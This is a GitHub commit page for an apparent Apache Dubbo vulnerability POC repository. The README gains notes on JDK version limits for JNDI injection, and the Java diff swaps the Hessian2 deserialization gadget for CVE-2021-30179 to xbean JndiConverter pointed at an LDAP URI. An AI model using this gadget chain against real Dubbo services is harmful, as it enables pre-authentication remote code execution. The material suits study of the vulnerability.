Skip to content

Commit

Permalink
Merge remote-tracking branch 'origin/main' into main
Browse files Browse the repository at this point in the history
  • Loading branch information
@lz2y
lz2y committed Mar 27, 2023
2 parents d000035 + 89a3a72 commit 00b6f0f
Show file tree
Hide file tree
Showing 2 changed files with 9 additions and 4 deletions.
7 changes: 7 additions & 0 deletions README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -10,8 +10,15 @@ Apache Dubbo 漏洞POC
- [ ] others
* 免责声明
* 项目仅供学习使用,任何未授权检测造成的直接或者间接的后果及损失,均由使用者本人负责
* 注意事项
* 需要用到JNDI注入的POC请于低版本的JDK版本测试(项目在8u71中测试)
> * 基于RMI的利用方式,JDK版本限制于6u132、7u131、8u121之前,在8u122及之后的版本中,加入了反序列化白名单的机制,关闭了RMI远程加载代码
> * 基于LDAP的利用方式,JDK版本限制于6u211、7u201、8u191、11.0.1之前,在8u191版本中,Oracle对LDAP向量设置限制,发布了CVE-2018-3149,关闭JNDI远程类加载
> * From:https://www.freebuf.com/vuls/279465.html
* 参考链接

* [GHSL-2021-034_043: Multiple pre-auth RCEs in Apache Dubbo](https://securitylab.github.com/advisories/GHSL-2021-034_043-apache-dubbo/)
* [dubbo源码浅析:默认反序列化利用之hessian2](https://www.anquanke.com/post/id/197658)
* 分析文章
* https://mp.weixin.qq.com/s/vHJpE2fZ8Lne-xFggoQiAg
6 changes: 2 additions & 4 deletions src/main/java/top/lz2y/vul/CVE202130179.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -86,10 +86,8 @@ private static void getRawReturnPayload(Hessian2ObjectOutput out, String ldapUri
}

private static void getBeanPayload(Hessian2ObjectOutput out, String ldapUri) throws IOException {
// JavaBeanDescriptor javaBeanDescriptor = new JavaBeanDescriptor("org.apache.xbean.propertyeditor.JndiConverter",7);
// javaBeanDescriptor.setProperty("asText",ldapUri);
JavaBeanDescriptor javaBeanDescriptor = new JavaBeanDescriptor("com.sun.rowset.JdbcRowSetImpl",7);
javaBeanDescriptor.setProperty("AutoCommit",ldapUri);
JavaBeanDescriptor javaBeanDescriptor = new JavaBeanDescriptor("org.apache.xbean.propertyeditor.JndiConverter",7);
javaBeanDescriptor.setProperty("asText",ldapUri);
out.writeObject(new Object[]{javaBeanDescriptor});
HashMap map = new HashMap();

Expand Down

0 comments on commit 00b6f0f

Please sign in to comment.